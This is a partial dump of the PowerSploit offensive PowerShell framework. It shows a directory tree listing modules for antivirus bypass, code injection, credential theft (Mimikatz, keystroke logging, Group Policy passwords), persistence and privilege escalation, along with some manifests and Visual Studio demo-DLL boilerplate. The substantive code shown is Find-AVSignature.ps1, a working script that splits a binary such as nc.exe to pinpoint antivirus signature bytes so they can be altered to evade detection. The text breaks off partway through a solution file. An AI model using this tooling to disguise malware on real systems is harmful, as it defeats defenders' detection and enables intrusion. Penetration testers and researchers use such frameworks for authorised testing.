├── .gitignore
├── AntivirusBypass
├── AntivirusBypass.psd1
├── AntivirusBypass.psm1
├── Find-AVSignature.ps1
└── Usage.md
├── CodeExecution
├── CodeExecution.psd1
├── CodeExecution.psm1
├── Invoke-DllInjection.ps1
├── Invoke-ReflectivePEInjection.ps1
├── Invoke-ReflectivePEInjection_Resources
│ ├── DemoDLL
│ │ ├── DemoDLL.sln
│ │ └── DemoDLL
│ │ │ ├── DemoDLL.cpp
│ │ │ ├── DemoDLL.h
│ │ │ ├── DemoDLL.vcxproj
│ │ │ ├── DemoDLL.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoDLL_RemoteProcess
│ │ ├── DemoDLL_RemoteProcess.sln
│ │ └── DemoDLL_RemoteProcess
│ │ │ ├── DemoDLL_RemoteProcess.cpp
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoExe
│ │ ├── DemoExe.sln
│ │ ├── DemoExe_MD
│ │ │ ├── DemoExe_MD.cpp
│ │ │ ├── DemoExe_MD.vcxproj
│ │ │ ├── DemoExe_MD.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ │ └── DemoExe_MDd
│ │ │ ├── DemoExe_MDd.cpp
│ │ │ ├── DemoExe_MDd.vcxproj
│ │ │ ├── DemoExe_MDd.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── ExeToInjectInTo
│ │ ├── ExeToInjectInTo.sln
│ │ └── ExeToInjectInTo
│ │ │ ├── ExeToInjectInTo.cpp
│ │ │ ├── ExeToInjectInTo.vcxproj
│ │ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ └── Shellcode
│ │ ├── readme.txt
│ │ ├── x64
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ ├── GetFuncAddress.asm
│ │ └── LoadLibraryA.asm
│ │ └── x86
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ └── GetProcAddress.asm
├── Invoke-Shellcode.ps1
├── Invoke-WmiCommand.ps1
└── Usage.md
├── Exfiltration
├── Exfiltration.psd1
├── Exfiltration.psm1
├── Get-GPPAutologon.ps1
├── Get-GPPPassword.ps1
├── Get-Keystrokes.ps1
├── Get-MicrophoneAudio.ps1
├── Get-TimedScreenshot.ps1
├── Get-VaultCredential.ps1
├── Get-VaultCredential.ps1xml
├── Invoke-CredentialInjection.ps1
├── Invoke-Mimikatz.ps1
├── Invoke-NinjaCopy.ps1
├── Invoke-TokenManipulation.ps1
├── LogonUser
│ └── LogonUser
│ │ ├── LogonUser.sln
│ │ ├── LogonUser
│ │ ├── LogonUser.cpp
│ │ ├── LogonUser.vcxproj
│ │ ├── LogonUser.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ │ └── logon
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── logon.cpp
│ │ ├── logon.vcxproj
│ │ ├── logon.vcxproj.filters
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── NTFSParser
│ ├── NTFSParser.sln
│ ├── NTFSParser
│ │ ├── NTFS.h
│ │ ├── NTFSParser.cpp
│ │ ├── NTFSParser.vcxproj
│ │ ├── NTFSParser.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── NTFSParserDLL
│ │ ├── NTFS.h
│ │ ├── NTFSParserDLL.cpp
│ │ ├── NTFSParserDLL.vcxproj
│ │ ├── NTFSParserDLL.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── Out-Minidump.ps1
├── Usage.md
└── VolumeShadowCopyTools.ps1
├── LICENSE
├── Mayhem
├── Mayhem.psd1
├── Mayhem.psm1
└── Usage.md
├── Persistence
├── Persistence.psd1
├── Persistence.psm1
└── Usage.md
├── PowerSploit.psd1
├── PowerSploit.psm1
├── PowerSploit.pssproj
├── PowerSploit.sln
├── Privesc
├── Get-System.ps1
├── PowerUp.ps1
├── Privesc.psd1
├── Privesc.psm1
└── README.md
├── README.md
├── Recon
├── Dictionaries
│ ├── admin.txt
│ ├── generic.txt
│ └── sharepoint.txt
├── Get-ComputerDetails.ps1
├── Get-HttpStatus.ps1
├── Invoke-Portscan.ps1
├── Invoke-ReverseDnsLookup.ps1
├── PowerView.ps1
├── README.md
├── Recon.psd1
└── Recon.psm1
├── ScriptModification
├── Out-CompressedDll.ps1
├── Out-EncodedCommand.ps1
├── Out-EncryptedScript.ps1
├── Remove-Comments.ps1
├── ScriptModification.psd1
├── ScriptModification.psm1
└── Usage.md
└── Tests
├── CodeExecution.tests.ps1
├── Exfiltration.tests.ps1
├── PowerSploit.tests.ps1
├── Privesc.tests.ps1
└── Recon.tests.ps1
/.gitignore:
--------------------------------------------------------------------------------
1 | #################
2 | ## Eclipse
3 | #################
4 |
5 | *.pydevproject
6 | .project
7 | .metadata
8 | bin/
9 | tmp/
10 | *.tmp
11 | *.bak
12 | *.swp
13 | *~.nib
14 | local.properties
15 | .classpath
16 | .settings/
17 | .loadpath
18 |
19 | # External tool builders
20 | .externalToolBuilders/
21 |
22 | # Locally stored "Eclipse launch configurations"
23 | *.launch
24 |
25 | # CDT-specific
26 | .cproject
27 |
28 | # PDT-specific
29 | .buildpath
30 |
31 |
32 | #################
33 | ## Visual Studio
34 | #################
35 |
36 | ## Ignore Visual Studio temporary files, build results, and
37 | ## files generated by popular Visual Studio add-ons.
38 |
39 | # User-specific files
40 | *.suo
41 | *.user
42 | *.sln.docstates
43 |
44 | # Build results
45 |
46 | [Dd]ebug/
47 | [Rr]elease/
48 | build/
49 | [Bb]in/
50 | [Oo]bj/
51 |
52 | # MSTest test Results
53 | [Tt]est[Rr]esult*/
54 | [Bb]uild[Ll]og.*
55 |
56 | *_i.c
57 | *_p.c
58 | *.ilk
59 | *.meta
60 | *.obj
61 | *.pch
62 | *.pdb
63 | *.pgc
64 | *.pgd
65 | *.rsp
66 | *.sbr
67 | *.tlb
68 | *.tli
69 | *.tlh
70 | *.tmp
71 | *.tmp_proj
72 | *.log
73 | *.vspscc
74 | *.vssscc
75 | .builds
76 | *.pidb
77 | *.log
78 | *.scc
79 |
80 | # Visual C++ cache files
81 | ipch/
82 | *.aps
83 | *.ncb
84 | *.opensdf
85 | *.sdf
86 | *.cachefile
87 |
88 | # Visual Studio profiler
89 | *.psess
90 | *.vsp
91 | *.vspx
92 |
93 | # Guidance Automation Toolkit
94 | *.gpState
95 |
96 | # ReSharper is a .NET coding add-in
97 | _ReSharper*/
98 | *.[Rr]e[Ss]harper
99 |
100 | # TeamCity is a build add-in
101 | _TeamCity*
102 |
103 | # DotCover is a Code Coverage Tool
104 | *.dotCover
105 |
106 | # NCrunch
107 | *.ncrunch*
108 | .*crunch*.local.xml
109 |
110 | # Installshield output folder
111 | [Ee]xpress/
112 |
113 | # DocProject is a documentation generator add-in
114 | DocProject/buildhelp/
115 | DocProject/Help/*.HxT
116 | DocProject/Help/*.HxC
117 | DocProject/Help/*.hhc
118 | DocProject/Help/*.hhk
119 | DocProject/Help/*.hhp
120 | DocProject/Help/Html2
121 | DocProject/Help/html
122 |
123 | # Click-Once directory
124 | publish/
125 |
126 | # Publish Web Output
127 | *.Publish.xml
128 | *.pubxml
129 |
130 | # NuGet Packages Directory
131 | ## TODO: If you have NuGet Package Restore enabled, uncomment the next line
132 | #packages/
133 |
134 | # Windows Azure Build Output
135 | csx
136 | *.build.csdef
137 |
138 | # Windows Store app package directory
139 | AppPackages/
140 |
141 | # Others
142 | sql/
143 | *.Cache
144 | ClientBin/
145 | [Ss]tyle[Cc]op.*
146 | ~$*
147 | *~
148 | *.dbmdl
149 | *.[Pp]ublish.xml
150 | *.pfx
151 | *.publishsettings
152 |
153 | # RIA/Silverlight projects
154 | Generated_Code/
155 |
156 | # Backup & report files from converting an old project file to a newer
157 | # Visual Studio version. Backup files are not needed, because we have git ;-)
158 | _UpgradeReport_Files/
159 | Backup*/
160 | UpgradeLog*.XML
161 | UpgradeLog*.htm
162 |
163 | # SQL Server files
164 | App_Data/*.mdf
165 | App_Data/*.ldf
166 |
167 | #############
168 | ## Windows detritus
169 | #############
170 |
171 | # Windows image file caches
172 | Thumbs.db
173 | ehthumbs.db
174 |
175 | # Folder config file
176 | Desktop.ini
177 |
178 | # Recycle Bin used on file shares
179 | $RECYCLE.BIN/
180 |
181 | # Mac crap
182 | .DS_Store
183 |
184 |
185 | #############
186 | ## Python
187 | #############
188 |
189 | *.py[co]
190 |
191 | # Packages
192 | *.egg
193 | *.egg-info
194 | dist/
195 | build/
196 | eggs/
197 | parts/
198 | var/
199 | sdist/
200 | develop-eggs/
201 | .installed.cfg
202 |
203 | # Installer logs
204 | pip-log.txt
205 |
206 | # Unit test / coverage reports
207 | .coverage
208 | .tox
209 |
210 | #Translations
211 | *.mo
212 |
213 | #Mr Developer
214 | .mr.developer.cfg
215 |
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'AntivirusBypass.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/AntivirusBypass/Find-AVSignature.ps1:
--------------------------------------------------------------------------------
1 | function Find-AVSignature
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Locate tiny AV signatures.
7 |
8 | PowerSploit Function: Find-AVSignature
9 | Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
17 |
18 | .PARAMETER Startbyte
19 |
20 | Specifies the first byte to begin splitting on.
21 |
22 | .PARAMETER Endbyte
23 |
24 | Specifies the last byte to split on.
25 |
26 | .PARAMETER Interval
27 |
28 | Specifies the interval size to split with.
29 |
30 | .PARAMETER Path
31 |
32 | Specifies the path to the binary you want tested.
33 |
34 | .PARAMETER OutPath
35 |
36 | Optionally specifies the directory to write the binaries to.
37 |
38 | .PARAMETER BufferLen
39 |
40 | Specifies the length of the file read buffer . Defaults to 64KB.
41 |
42 | .PARAMETER Force
43 |
44 | Forces the script to continue without confirmation.
45 |
46 | .EXAMPLE
47 |
48 | PS C:\> Find-AVSignature -Startbyte 0 -Endbyte max -Interval 10000 -Path c:\test\exempt\nc.exe
49 | PS C:\> Find-AVSignature -StartByte 10000 -EndByte 20000 -Interval 1000 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run2 -Verbose
50 | PS C:\> Find-AVSignature -StartByte 16000 -EndByte 17000 -Interval 100 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run3 -Verbose
51 | PS C:\> Find-AVSignature -StartByte 16800 -EndByte 16900 -Interval 10 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run4 -Verbose
52 | PS C:\> Find-AVSignature -StartByte 16890 -EndByte 16900 -Interval 1 -Path C:\test\exempt\nc.exe -OutPath c:\test\output\run5 -Verbose
53 |
54 | .NOTES
55 |
56 | Several of the versions of "DSplit.exe" available on the internet contain malware.
57 |
58 | .LINK
59 |
60 | http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
61 | https://github.com/mattifestation/PowerSploit
62 | http://www.exploit-monday.com/
63 | http://heapoverflow.com/f0rums/project.php?issueid=34&filter=changes&page=2
64 | #>
65 |
66 | [CmdletBinding()] Param(
67 | [Parameter(Mandatory = $True)]
68 | [ValidateRange(0,4294967295)]
69 | [UInt32]
70 | $StartByte,
71 |
72 | [Parameter(Mandatory = $True)]
73 | [String]
74 | $EndByte,
75 |
76 | [Parameter(Mandatory = $True)]
77 | [ValidateRange(0,4294967295)]
78 | [UInt32]
79 | $Interval,
80 |
81 | [String]
82 | [ValidateScript({Test-Path $_ })]
83 | $Path = ($pwd.path),
84 |
85 | [String]
86 | $OutPath = ($pwd),
87 |
88 |
89 | [ValidateRange(1,2097152)]
90 | [UInt32]
91 | $BufferLen = 65536,
92 |
93 | [Switch] $Force
94 |
95 | )
96 |
97 | #test variables
98 | if (!(Test-Path $Path)) {Throw "File path not found"}
99 | $Response = $True
100 | if (!(Test-Path $OutPath)) {
101 | if ($Force -or ($Response = $psCmdlet.ShouldContinue("The `"$OutPath`" does not exist! Do you want to create the directory?",""))){new-item ($OutPath)-type directory}
102 | }
103 | if (!$Response) {Throw "Output path not found"}
104 | if (!(Get-ChildItem $Path).Exists) {Throw "File not found"}
105 | [Int32] $FileSize = (Get-ChildItem $Path).Length
106 | if ($StartByte -gt ($FileSize - 1) -or $StartByte -lt 0) {Throw "StartByte range must be between 0 and $Filesize"}
107 | [Int32] $MaximumByte = (($FileSize) - 1)
108 | if ($EndByte -ceq "max") {$EndByte = $MaximumByte}
109 |
110 | #Recast $Endbyte into an Integer so that it can be compared properly.
111 | [Int32]$EndByte = $EndByte
112 |
113 | #If $Endbyte is greater than the file Length, use $MaximumByte.
114 | if ($EndByte -gt $FileSize) {$EndByte = $MaximumByte}
115 |
116 | #If $Endbyte is less than the $StartByte, use 1 Interval past $StartByte.
117 | if ($EndByte -lt $StartByte) {$EndByte = $StartByte + $Interval}
118 |
119 | Write-Verbose "StartByte: $StartByte"
120 | Write-Verbose "EndByte: $EndByte"
121 |
122 | #find the filename for the output name
123 | [String] $FileName = (Split-Path $Path -leaf).Split('.')[0]
124 |
125 | #Calculate the number of binaries
126 | [Int32] $ResultNumber = [Math]::Floor(($EndByte - $StartByte) / $Interval)
127 | if (((($EndByte - $StartByte) % $Interval)) -gt 0) {$ResultNumber = ($ResultNumber + 1)}
128 |
129 | #Prompt user to verify parameters to avoid writing binaries to the wrong directory
130 | $Response = $True
131 | if ( $Force -or ( $Response = $psCmdlet.ShouldContinue("This script will result in $ResultNumber binaries being written to `"$OutPath`"!",
132 | "Do you want to continue?"))){}
133 | if (!$Response) {Return}
134 |
135 | Write-Verbose "This script will now write $ResultNumber binaries to `"$OutPath`"."
136 | [Int32] $Number = [Math]::Floor($Endbyte/$Interval)
137 |
138 | #Create a Read Buffer and Stream.
139 | #Note: The Filestream class takes advantage of internal .NET Buffering. We set the default internal buffer to 64KB per http://research.microsoft.com/pubs/64538/tr-2004-136.doc.
140 | [Byte[]] $ReadBuffer=New-Object byte[] $BufferLen
141 | [System.IO.FileStream] $ReadStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read, $BufferLen)
142 |
143 | #write out the calculated number of binaries
144 | [Int32] $i = 0
145 | for ($i -eq 0; $i -lt $ResultNumber + 1 ; $i++)
146 | {
147 | # If this is the Final Binary, use $EndBytes, Otherwise calculate based on the Interval
148 | if ($i -eq $ResultNumber) {[Int32]$SplitByte = $EndByte}
149 | else {[Int32] $SplitByte = (($StartByte) + (($Interval) * ($i)))}
150 |
151 | Write-Verbose "Byte 0 -> $($SplitByte)"
152 |
153 | #Reset ReadStream to beginning of file
154 | $ReadStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
155 |
156 | #Build a new FileStream for Writing
157 | [String] $outfile = Join-Path $OutPath "$($FileName)_$($SplitByte).bin"
158 | [System.IO.FileStream] $WriteStream = New-Object System.IO.FileStream($outfile, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $BufferLen)
159 |
160 | [Int32] $BytesLeft = $SplitByte
161 | Write-Verbose "$($WriteStream.name)"
162 |
163 | #Write Buffer Length to the Writing Stream until the bytes left is smaller than the buffer
164 | while ($BytesLeft -gt $BufferLen){
165 | [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BufferLen)
166 | $WriteStream.Write($ReadBuffer, 0, $count)
167 | $BytesLeft = $BytesLeft - $count
168 | }
169 |
170 | #Write the remaining bytes to the file
171 | do {
172 | [Int32]$count = $ReadStream.Read($ReadBuffer, 0, $BytesLeft)
173 | $WriteStream.Write($ReadBuffer, 0, $count)
174 | $BytesLeft = $BytesLeft - $count
175 | }
176 | until ($BytesLeft -eq 0)
177 | $WriteStream.Close()
178 | $WriteStream.Dispose()
179 | }
180 | Write-Verbose "Files written to disk. Flushing memory."
181 | $ReadStream.Dispose()
182 |
183 | #During testing using large binaries, memory usage was excessive so lets fix that
184 | [System.GC]::Collect()
185 | Write-Verbose "Completed!"
186 | }
187 |
--------------------------------------------------------------------------------
/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module AntivirusBypass`
7 |
8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'CodeExecution.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Company or vendor of this module
16 | CompanyName = ''
17 |
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 |
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Code Execution Module'
23 |
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
32 | 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
33 | }
34 |
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
10 | extern "C" __declspec( dllexport ) char* StringFunc()
11 | {
12 | ostream *outputStream = NULL;
13 |
14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout.
15 | //outputStream = &cout;
16 |
17 | ostringstream *stringStream = new ostringstream();
18 | outputStream = stringStream;
19 |
20 | (*outputStream) << "String DLL function is working" << endl << endl;
21 |
22 | string output = (*stringStream).str();
23 | const char* outputStr = output.c_str();
24 |
25 | char* out = new char[output.size()+1];
26 | strcpy(out, outputStr);
27 | out[output.size()] = '\0';
28 |
29 |
30 | return out;
31 | }
32 |
33 | extern "C" __declspec( dllexport ) void VoidFunc()
34 | {
35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n");
36 | return;
37 | }
38 |
39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
40 | {
41 | wostream *outputStream = NULL;
42 |
43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout.
44 | outputStream = &wcout;
45 |
46 | wostringstream *stringStream = new wostringstream();
47 | outputStream = stringStream;
48 |
49 | (*outputStream) << L"WString DLL function is working" << endl << endl;
50 |
51 | wstring output = (*stringStream).str();
52 | const wchar_t* outputStr = output.c_str();
53 |
54 | wchar_t* out = new wchar_t[output.size()+1];
55 | wcscpy(out, outputStr);
56 | out[output.size()] = '\0';
57 |
58 |
59 | return out;
60 | }
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef DEMODLL_EXPORTS
8 | #define DEMODLL_API __declspec(dllexport)
9 | #else
10 | #define DEMODLL_API __declspec(dllimport)
11 | #endif
12 |
13 | using namespace std;
14 |
15 | extern "C" __declspec( dllexport ) char* StringFunc();
16 | extern "C" __declspec( dllexport ) void VoidFunc();
17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc();
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
